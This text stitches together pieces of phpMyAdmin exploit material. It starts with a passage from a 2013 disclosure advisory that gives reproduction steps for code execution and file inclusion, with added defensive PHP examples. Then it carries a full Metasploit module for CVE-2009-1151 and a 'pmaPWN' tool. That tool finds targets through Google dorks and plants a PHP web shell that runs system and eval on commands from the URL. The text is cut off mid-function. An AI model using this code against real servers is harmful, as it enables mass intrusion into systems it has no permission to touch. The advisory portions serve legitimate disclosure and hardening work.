It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00".
Click "OK" and Firefox will send out manipulated POST request.
7. We are greeted by phpinfo function output - code execution is confirmed.
PMA version 4.0.0-RC2 contains almost identical vulnerability:
Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2):
------------------------[ source code start ]----------------------------------
case 'replace_prefix_tbl':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
$a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) .
' RENAME ' . PMA_Util::backquote($newtablename); // CHANGE PREFIX PATTERN
$run_parts = true;
break;
case 'copy_tbl_change_prefix':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current);
$a_query = 'CREATE TABLE ' . PMA_Util::backquote($newtablename) .
' SELECT * FROM ' . PMA_Util::backquote($selected[$i]); // COPY TABLE AND CHANGE PREFIX PATTERN
$run_parts = true;
break;
------------------------[ source code end ]------------------------------------
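As an added example (not code from the advisory or from phpMyAdmin), here is the prefix replacement done without interpolating user input into a pattern. The first function needs no regular expression at all; the second keeps preg_replace for readers who want the regex form and shows the two things that make it safe: preg_quote() on the user-supplied prefix, with the delimiter and anchor supplied by the code, and a callback for the replacement so that `$1`-style references in the user's "to" value are never interpreted. Function names and table names are constructed for this example.

```php
<?php
// Added example (not part of the advisory): literal table-prefix replacement.

/* Plain string comparison: the user's prefix is data, not a pattern. */
function replace_prefix(string $table, string $from, string $to): string
{
    if ($from === '' || strncmp($table, $from, strlen($from)) !== 0) {
        return $table;                       // prefix not present at the start
    }
    return $to . substr($table, strlen($from));
}

/* Regex form, if preg_replace is to be kept: the delimiter, the anchor and
 * the (absent) modifiers come from the code; only a quoted literal comes
 * from the user. The replacement is returned by a callback, so preg_replace
 * never parses the user's "to" string for backreferences. */
function replace_prefix_regex(string $table, string $from, string $to): string
{
    if ($from === '') {
        return $table;
    }
    $pattern = '/^' . preg_quote($from, '/') . '/';
    return preg_replace_callback($pattern, fn() => $to, $table);
}

$tables = ['old_users', 'old_orders', 'archive_old_logs'];
foreach ($tables as $t) {
    echo str_pad($t, 18), ' -> ', replace_prefix($t, 'old_', 'new_'), "\n";
}

// A "from" value that would have been a pattern terminator plus modifier when
// concatenated into the pattern is just literal text after preg_quote().
echo str_pad('/etbl', 18), ' -> ', replace_prefix_regex('/etbl', '/e', 'x_'), "\n";

// A "to" value containing a backreference is copied, not interpreted.
echo str_pad('old_users', 18), ' -> ', replace_prefix_regex('old_users', 'old_', '$1_'), "\n";
```

For detection, the page's own precondition is a useful signal: on PHP 5.4.7 and later the injected pattern fails with "preg_replace(): Null byte in regex" in the PHP error log, so that warning appearing for mult_submits.inc.php is worth alerting on.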
############################################################################
2. Locally Saved SQL Dump File Multiple File Extension Remote Code Execution
############################################################################
Reason:
1. insecure names of locally saved dump files
Attack vectors:
1. user-supplied POST parameter "filename_template"
Preconditions:
1. logged in as valid PMA user
2. configuration setting "SaveDir" defined and pointed to
directory, which is writable for php and directly accessible over web
(by default "SaveDir" is empty and PMA is secure)
3. Apache webserver with unknown MIME for "sql" extension
PMA security advisory: PMASA-2013-3
CVE id: CVE-2013-3239
Affected are PMA versions 3.5.8 and 4.0.0-RC2
There is a security weakness in the way PMA handles
locally saved database dump files. It is possible that a saved
dump file has multiple extensions, and if the Apache webserver does not
know the MIME type of the "sql" extension (which is the default),
then for example a "foobar.php.sql" file will be treated as a php file.
More information:
http://httpd.apache.org/docs/2.2/mod/mod_mime.html
section "Files with Multiple Extensions"
http://www.acunetix.com/websitesecurity/upload-forms-threat/
section "Case 4: Double extensions (part 1)"
Test:
1. activate export to local server, be sure, that directory is writable:
$cfg['SaveDir'] = './';
2. select database for test, insert row into table with included
php code like "<?php phpinfo();?>"
3. try to export that database or table, you have now additional option:
"Save on server in the directory ./"
Confirm that option, let the format be as "SQL".
"File name template" change to "@DATABASE () php" and click "Go" button.
Server responds with "Dump has been saved to file ./test.php.sql."
4. Request created file with webbrowser:
http://localhost/PMA/test.php.sql
In case of success we can see output of phpinfo() function, which
confirms remote code execution.
###############################################################################
3. Local File Inclusion in "export.php"
###############################################################################
Reason:
1. insufficient sanitization of user data before using in include_once
Attack vectors:
1. user-supplied POST parameter "what"
Preconditions:
1. logged in as valid PMA user
2. PHP must be < 5.3.4 for null-byte attacks to work
PMA security advisory: PMASA-2013-4
CVE id: CVE-2013-3240
Affected is PMA version 4.0.0-RC2
Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
$GLOBALS[$one_post_param] = $one_post_value;
}
PMA_Util::checkParameters(array('what', 'export_type'));
// export class instance, not array of properties, as before
$export_plugin = PMA_getPlugin(
"export",
$what,
'libraries/plugins/export/',
array(
'export_type' => $export_type,
'single_table' => isset($single_table)
)
);
------------------------[ source code end ]------------------------------------
We can see, that user-supplied parameter "what" is used as second argument for
the function PMA_getPlugin(). Let's follow execution flow:
Php script "libraries/plugin_interface.lib.php" line 20:
------------------------[ source code start ]----------------------------------
function PMA_getPlugin(
$plugin_type,
$plugin_format,
$plugins_dir,
$plugin_param = false
) {
$GLOBALS['plugin_param'] = $plugin_param;
$class_name = strtoupper($plugin_type[0])
. strtolower(substr($plugin_type, 1))
. strtoupper($plugin_format[0])
. strtolower(substr($plugin_format, 1));
$file = $class_name . ".class.php";
if (is_file($plugins_dir . $file)) {
include_once $plugins_dir . $file;
------------------------[ source code end ]------------------------------------
As seen above, the second argument "$plugin_format" is used in the variable "$file"
and after that in the functions is_file() and include_once. No sanitization
is applied to the user-submitted parameter "what", which leads to a directory
traversal and local file inclusion vulnerability. With older PHP versions
it may be possible to use a null byte attack and include arbitrary files on the server.
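Both this section and the file inclusion section of the phpMyAdmin 2.6.1 advisory above (the "theme" and "cfg[Server][extension]" parameters) share one root cause: a user-supplied name is concatenated into a path and then included. The added example below, which is not code from either advisory or from phpMyAdmin, shows the allowlist pattern that fixes both: the plugin directory is scanned once into a name-to-file map with a strict name pattern, and the request value is only ever used as a lookup key, so it never reaches is_file() or include. Function names, the temporary directory and its files are constructed for the example.

```php
<?php
// Added example (not part of the advisories): allowlist an include target by
// name instead of concatenating the request value into a path.

/* Build the name -> file map for one plugin directory. Only regular files
 * with the expected suffix and a strict bare name are eligible. */
function plugin_catalog(string $dir, string $suffix): array
{
    $catalog = [];
    foreach (scandir($dir) as $entry) {
        if (substr($entry, -strlen($suffix)) !== $suffix) {
            continue;
        }
        $name = substr($entry, 0, -strlen($suffix));
        if (preg_match('/\A[a-z0-9_]{1,32}\z/', $name) && is_file("$dir/$entry")) {
            $catalog[$name] = "$dir/$entry";
        }
    }
    return $catalog;
}

/* Map the request value to a file, or refuse. The user string is compared
 * against catalog keys byte for byte; "../", NUL bytes and case variants
 * simply do not match anything. */
function resolve_plugin(array $catalog, string $requested): string
{
    if (!array_key_exists($requested, $catalog)) {
        throw new InvalidArgumentException('unknown plugin ' . json_encode($requested));
    }
    return $catalog[$requested];
}

// Constructed sandbox: two legitimate plugin files and one stray file.
$dir = sys_get_temp_dir() . '/plugins_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/sql.class.php", "<?php // sql export plugin\n");
file_put_contents("$dir/csv.class.php", "<?php // csv export plugin\n");
file_put_contents("$dir/notes.txt", "not a plugin\n");

$catalog = plugin_catalog($dir, '.class.php');

foreach (['sql', 'csv', '../../etc/passwd', "sql\0", 'notes', 'SQL'] as $what) {
    try {
        echo str_pad(json_encode($what), 22), ' -> ', basename(resolve_plugin($catalog, $what)), "\n";
    } catch (InvalidArgumentException $e) {
        echo str_pad(json_encode($what), 22), ' -> refused', "\n";
    }
}

array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

The same catalog function serves the theme and dbi-extension cases from the 2.6.1 advisory by pointing it at the theme or dbi directory with the matching suffix; the request value is then a key in every case, and the null-byte trick has nothing to truncate.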
###############################################################################
4. $GLOBALS array overwrite in "export.php"
###############################################################################
Reason:
1. insecure POST parameters importing
Attack vectors:
1. user-supplied POST parameters
Preconditions:
1. logged in as valid PMA user
PMA security advisory: PMASA-2013-5
CVE id: CVE-2013-3241
Affected is PMA version 4.0.0-RC2
Php script "export.php" line 20:
------------------------[ source code start ]----------------------------------
foreach ($_POST as $one_post_param => $one_post_value) {
$GLOBALS[$one_post_param] = $one_post_value;
}
PMA_Util::checkParameters(array('what', 'export_type'));
------------------------[ source code end ]------------------------------------
We can see that arbitrary values in the $GLOBALS array can be overwritten by
submitting POST parameters. Such a way of importing input data is
very insecure, and in specific situations it is possible to overwrite any
variable in global scope. This can lead to many ways of exploitation. Below is
presented one of the possibilities.
Php script "export.php" line 59:
------------------------[ source code start ]----------------------------------
$onserver = false;
$save_on_server = false;
...
if ($quick_export) {
$onserver = $_REQUEST['quick_export_onserver'];
} else {
$onserver = $_REQUEST['onserver'];
}
// Will we save dump on server?
$save_on_server = ! empty($cfg['SaveDir']) && $onserver;
...
// Open file on server if needed
if ($save_on_server) {
$save_filename = PMA_Util::userDir($cfg['SaveDir'])
. preg_replace('@[/\\\\]@', '_', $filename);
...
if (! $file_handle = @fopen($save_filename, 'w')) {
$message = PMA_Message::error(
...
/* If we saved on server, we have to close file now */
if ($save_on_server) {
$write_result = @fwrite($file_handle, $dump_buffer);
fclose($file_handle);
------------------------[ source code end ]------------------------------------
As seen above, when the configuration setting "SaveDir" is set, it is possible
to save a database dump on the PMA webserver. By default "SaveDir" is unset,
which prevents the security problems described here. Because we can overwrite
any variable in the global scope, it is possible to set "SaveDir" to an
arbitrary value. This leads to a directory traversal vulnerability: the
attacker is able to save a database dump to any directory on the webserver, as
long as filesystem permissions allow it. The database dump can be saved with
the extension ".sql". If the attacker can dump a database that contains PHP
code and tags, that content ends up in the dump file. If the filename is
something like "foobar.php.sql", then by default most Apache webserver
installations will try to parse this dump file as a PHP file, which can
finally lead to a remote code execution vulnerability.
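The two weak spots of the chain above, request parameters flowing into $GLOBALS and a dump path built from an attacker-controlled SaveDir, each in a hardened form. This is an added illustration, not waraxe's or phpMyAdmin's code; the function names and the protected-name list are assumptions.

```php
<?php
// Added example (not phpMyAdmin's code): hardened counterparts of the two
// steps shown in the advisory above.

// Import only the request parameters the page expects, into a local array
// rather than $GLOBALS. A short list of names that must never be taken
// from the request is enforced regardless of the allowlist (assumed list).
function importRequestParams(array $post, array $allowed)
{
    $protected = array('cfg', 'GLOBALS', '_SESSION', '_SERVER', '_COOKIE', 'PMA_Config');
    $imported = array();
    foreach ($post as $name => $value) {
        if (!in_array($name, $allowed, true) || in_array($name, $protected, true)) {
            continue;   // anything not explicitly expected is dropped
        }
        $imported[$name] = $value;
    }
    return $imported;
}

// Build the path of a dump file, or return null when the request must be
// refused. The original only replaced slashes in the file name and trusted
// $cfg['SaveDir'] completely.
function exportSavePath($saveDir, $filename)
{
    // A plain file name with a single ".sql" extension: this rejects both
    // "../foobar.sql" and the "foobar.php.sql" trick from the advisory.
    if (basename($filename) !== $filename || !preg_match('/^[A-Za-z0-9_\-]+\.sql$/', $filename)) {
        return null;
    }
    // realpath() requires the directory to exist and strips traversal
    // components; the value is still only as trustworthy as the config it
    // came from, which is why the import above matters.
    $base = realpath($saveDir);
    if ($base === false || !is_dir($base) || !is_writable($base)) {
        return null;
    }
    return $base . DIRECTORY_SEPARATOR . $filename;
}

// Constructed request mirroring the advisory: the export parameters plus
// an attempt to smuggle cfg[SaveDir] in through POST.
$post = array(
    'what'        => 'sql',
    'export_type' => 'server',
    'filename'    => 'foobar.php.sql',
    'cfg'         => array('SaveDir' => '/var/www/html'),
);
$params = importRequestParams($post, array('what', 'export_type', 'filename'));
var_dump(array_key_exists('cfg', $params));   // the injected key never reaches the caller
var_dump(exportSavePath(sys_get_temp_dir(), $params['filename']));   // double extension refused
var_dump(exportSavePath(sys_get_temp_dir(), 'foobar.sql'));          // plain name accepted
```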
Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
16.04.2013 -> Sent email to developers
16.04.2013 -> First response email from developers
16.04.2013 -> Sent detailed information to developers
24.04.2013 -> New PMA versions and security advisories released
25.04.2013 -> Current advisory released
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe () yahoo com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
metasploit/PhpMyAdmin Config File Code Injection ( php)
##
# $Id: phpmyadmin_config.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PhpMyAdmin Config File Code Injection',
      'Description'    => %q{
        This module exploits a vulnerability in PhpMyAdmin's setup
        feature which allows an attacker to inject arbitrary PHP
        code into a configuration file. The original advisory says
        the vulnerability is present in phpMyAdmin versions 2.11.x
        < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on
        3.0.1.1.

        The file where our payload is written
        (phpMyAdmin/config/config.inc.php) is not directly used by
        the system, so it may be a good idea to either delete it or
        copy the running config (phpMyAdmin/config.inc.php) over it
        after successful exploitation.
      },
      'Author'         =>
        [
          'Greg Ose', # Discovery
          'pagvac',   # milw0rm PoC
          'egypt'     # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 9669 $',
      'References'     =>
        [
          [ 'CVE', '2009-1151' ],
          [ 'OSVDB', '53076' ],
          [ 'URL', 'http://www.milw0rm.com/exploits/8921' ],
          [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php' ],
          [ 'URL', 'http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'Space'       => 4000, # unlimited really since our shellcode gets written to a file
          'DisableNops' => true,
          # No filtering whatsoever, so no badchars
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Keys'        => ['php'],
        },
      'Targets'        =>
        [
          [ 'Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 24 2009'))

    register_options(
      [
        OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpMyAdmin/']),
      ], self.class)
  end

  def exploit
    # First, grab the session cookie and the CSRF token
    print_status("Grabbing session cookie and CSRF token")
    uri = datastore['URI'] + "scripts/setup.php"
    response = send_request_raw({ 'uri' => uri })
    if !response
      raise RuntimeError.new("Server did not respond to our initial request")
      return
    end
    if (response.body !~ /"token"\s*value="([^"]*)"/)
      raise RuntimeError.new("Couldn't find token and can't continue without it. Is URI set correctly?")
      return
    end
    token = $1
    cookie = response["Set-Cookie"]

    # There is probably a great deal of randomization that can be done with
    # this format.
    config = "a:1:{s:7:\"Servers\";a:1:{i:0;a:6:{s:#{payload.encoded.length + 13}:\""
    config << "host']='';" + payload.encoded + ";//"
    config << '";s:9:"' + rand_text_alpha(9) + '";s:9:"extension";s:6:"mysqli";s:12:"connect_type"'
    config << ';s:3:"tcp";s:8:"compress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"' + rand_text_alpha(4) + '";}}}'

    data = "token=#{token}&action=save&configuration="
    data << Rex::Text.uri_encode(config)
    data << "&eoltype=unix"

    # Now that we've got the cookie and token, send the evil
    print_status("Sending save request")
    response = send_request_raw({
      'uri'     => datastore['URI'] + "/scripts/setup.php",
      'method'  => 'POST',
      'data'    => data,
      'cookie'  => cookie,
      'headers' =>
        {
          'Content-Type'   => 'application/x-www-form-urlencoded',
          'Content-Length' => data.length
        }
    }, 3)

    print_status("Requesting our payload")
    # very short timeout because the request may never return if we're
    # sending a socket payload
    timeout = 0.1
    response = send_request_raw({
      # Allow findsock payloads to work
      'global' => true,
      'uri'    => datastore['URI'] + "/config/config.inc.php"
    }, timeout)

    handler
  end
end
Hacking Expose!/pmaPWN phpMyAdmin Code Injection Scanner ( na)
<?php
$list = array(
'/phpmyadmin/',
'/phpMyAdmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
);
if ($argc > 1) {
    print "|****************************************************************|\n";
    print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
    print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
    print " This is PHP version original http://milw0rm.com/exploits/8921\n";
    print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
    print " greetz: Hacking Expose!, HM Security, darkc0de\n";
    print "|****************************************************************|\n";
    print "\n";
    print "Usage: php $argv[0] \n";
    exit;
}
print "|****************************************************************|\n";
print " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n";
print " phpMyAdmin Code Injection RCE Scanner & Exploit\n";
print " This is PHP version original http://milw0rm.com/exploits/8921\n";
print " credit: Greg Ose, pagvac @ gnucitizen.org\n";
print " greetz: Hacking Expose!, HM Security, darkc0de\n";
print "|****************************************************************|\n";
print "\n";
$Handlex = fopen("pmaPWN.log", "a+");
fwrite($Handlex, "|****************************************************************|\n");
fwrite($Handlex, " pmaPWN.php - d3ck4, hacking.expose@gmail.com\n");
fwrite($Handlex, " phpMyAdmin Code Injection RCE Scanner & Exploit\n");
fwrite($Handlex, " This is PHP version original http://milw0rm.com/exploits/8921\n");
fwrite($Handlex, " credit: Greg Ose, pagvac @ gnucitizen.org\n");
fwrite($Handlex, " greetz: Hacking Expose!, HM Security, darkc0de\n");
fwrite($Handlex, "|****************************************************************|\n\n");
print "[-] Master, where you want to go today? \n";
print "[-] example dork: intitle:phpMyAdmin \n";
fwrite(STDOUT, "\n[ pwn3r@google ~] ./dork -s ");
$dork = trim(fgets(STDIN));
print "\n[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n";
fwrite($Handlex, "[!] QUERY: SELECT * FROM `googledb` WHERE `keyword` = '$dork'\n");
$res = array();   // one array of result links per search page
$total = 0;
for ($i = 0; $i <= 900; $i += 100) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "http://www.google.com/cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9');
    $pg = curl_exec($ch);
    curl_close($ch);
    if (preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" class=(.*?)>/", $pg, $links)) {
        $res[] = $links[2];
    }
}
foreach ($res as $key) {
    foreach ($key as $target) {
        $total++;
    }
}
print "[+] Done. $total rows return.\n";
fwrite($Handlex, "[+] Done. $total rows return.\n");
fclose($Handlex);
foreach ($res as $key) {
    foreach ($key as $target) {
        $Handlex = fopen("pmaPWN.log", "a+");
        $real = parse_url($target);
        $url = "http://" . $real['host'];
        print "\n[-] Scanning phpMyAdmin on " . $url . "\n";
        fwrite($Handlex, "\n[-] Scanning phpMyAdmin on " . $url . "\n");
        fclose($Handlex);
        sleep(5);
        $curlHandle = curl_multi_init();
        for ($i = 0; $i < count($list); $i++) {
            $curl[$i] = addHandle($curlHandle, $url . $list[$i]);
        }
        ExecHandle($curlHandle);
        for ($i = 0; $i < count($list); $i++) {
            $text[$i] = curl_multi_getcontent($curl[$i]);
            //echo $url.$list[$i]."\n";
            $Handlex = fopen("pmaPWN.log", "a+");
            if (preg_match("/<title>phpMyAdmin/", $text[$i]) or preg_match("/<title>Access denied/", $text[$i]) and preg_match("/phpMyAdmin/", $text[$i])) {
                print "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]";
                print "\n[+] Testing vulnerable, wait sec..\n";
                fwrite($Handlex, "\n[!] w00t! w00t! Found phpMyAdmin [ " . $url . $list[$i] . " ]");
                fwrite($Handlex, "\n[+] Testing vulnerable, wait sec..\n");
                if (preg_match("/phpMyAdmin is more friendly with a/", $text[$i])) {
                    print "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n";
                    fwrite($Handlex, "\n[!] w00t! w00t! NO PASSWD --> [ " . $url . $list[$i] . " ]\n");
                }
                fclose($Handlex);
                exploit_site($url . $list[$i]);
            } else {
                fclose($Handlex);   // the log handle was leaked on this path before
            }
        }
        for ($i = 0; $i < count($list); $i++) { // remove the handles
            curl_multi_remove_handle($curlHandle, $curl[$i]);
        }
        curl_multi_close($curlHandle);
        sleep(5);
    }
}

function addHandle(&$curlHandle, $url)
{
    $cURL = curl_init();
    curl_setopt($cURL, CURLOPT_URL, $url);
    curl_setopt($cURL, CURLOPT_HEADER, 0);
    curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($cURL, CURLOPT_TIMEOUT, 10);
    curl_multi_add_handle($curlHandle, $cURL);
    return $cURL;
}

// execute the handle until the flag passed
// to function is greater than 0
function ExecHandle(&$curlHandle)
{
    $flag = null;
    do {
        // fetch pages in parallel
        curl_multi_exec($curlHandle, $flag);
    } while ($flag > 0);
}

function exploit_site($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_URL, $url . "scripts/setup.php");
    $result = curl_exec($ch);
    curl_close($ch);
    $ch2 = curl_init();
    curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch2, CURLOPT_HEADER, 1);
    curl_setopt($ch2, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch2, CURLOPT_URL, $url . "config/config.inc.php");
    $result2 = curl_exec($ch2);
    curl_close($ch2);
    //print $url;
    if (preg_match("/200 OK/", $result) and preg_match("/token/", $result) and preg_match("/200 OK/", $result2)) {
        print "\n[!] w00t! w00t! Found possible phpMyAdmin vuln";
        print "\n[+] Exploiting, wait sec..\n";
        $Handlex = fopen("pmaPWN.log", "a+");
        fwrite($Handlex, "\n[!] w00t! w00t! Found possible phpMyAdmin vuln");
        fwrite($Handlex, "\n[+] Exploiting, wait sec..\n");
        fclose($Handlex);
        exploit($url);
    } else {
        $Handlex = fopen("pmaPWN.log", "a+");
        print "\n[-] Shit! no luck.. not vulnerable\n";
        fwrite($Handlex, "\n[-] Shit! no luck.. not vulnerable\n");
        fclose($Handlex);
    }
}

function exploit($w00t)
{
    $Handlex = fopen("pmaPWN.log", "a+");
    $useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729) "; //firefox
    //first get cookie + token
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php"); //URL
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 200);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); //return site as string
    curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
    curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
    $result = curl_exec($curl);
    curl_close($curl);
    // the original had a stray ";" after this if(), so the match result was
    // never checked; the second captured token is the one the form uses
    $token = '';
    if (preg_match_all("/token\"\s+value=\"([^>]+?)\"/", $result, $matches) && isset($matches[1][1])) {
        $token = $matches[1][1];
    }
    if ($token != '') {
        print "\n[!] w00t! w00t! Got token = " . $token;
        fwrite($Handlex, "\n[!] w00t! w00t! Got token = " . $token);
        $payload = "token=".$token."&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if(\$_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem(\$_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if(\$_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval(\$_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix";
        print "\n[+] Sending evil payload mwahaha.. \n";
        fwrite($Handlex, "\n[+] Sending evil payload mwahaha.. \n");
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $w00t . "scripts/setup.php");
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 20);
        curl_setopt($curl, CURLOPT_TIMEOUT, 200);
        curl_setopt($curl, CURLOPT_USERAGENT, $useragent);
        curl_setopt($curl, CURLOPT_REFERER, $w00t);
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($curl, CURLOPT_COOKIEFILE, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_COOKIEJAR, "exploitcookie.txt");
        curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 3);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
        $result = curl_exec($curl);
        curl_close($curl);
        print "\n[!] w00t! w00t! You should now have shell here";
        print "\n[+] " . $w00t . "config/config.inc.php?c=id \n";
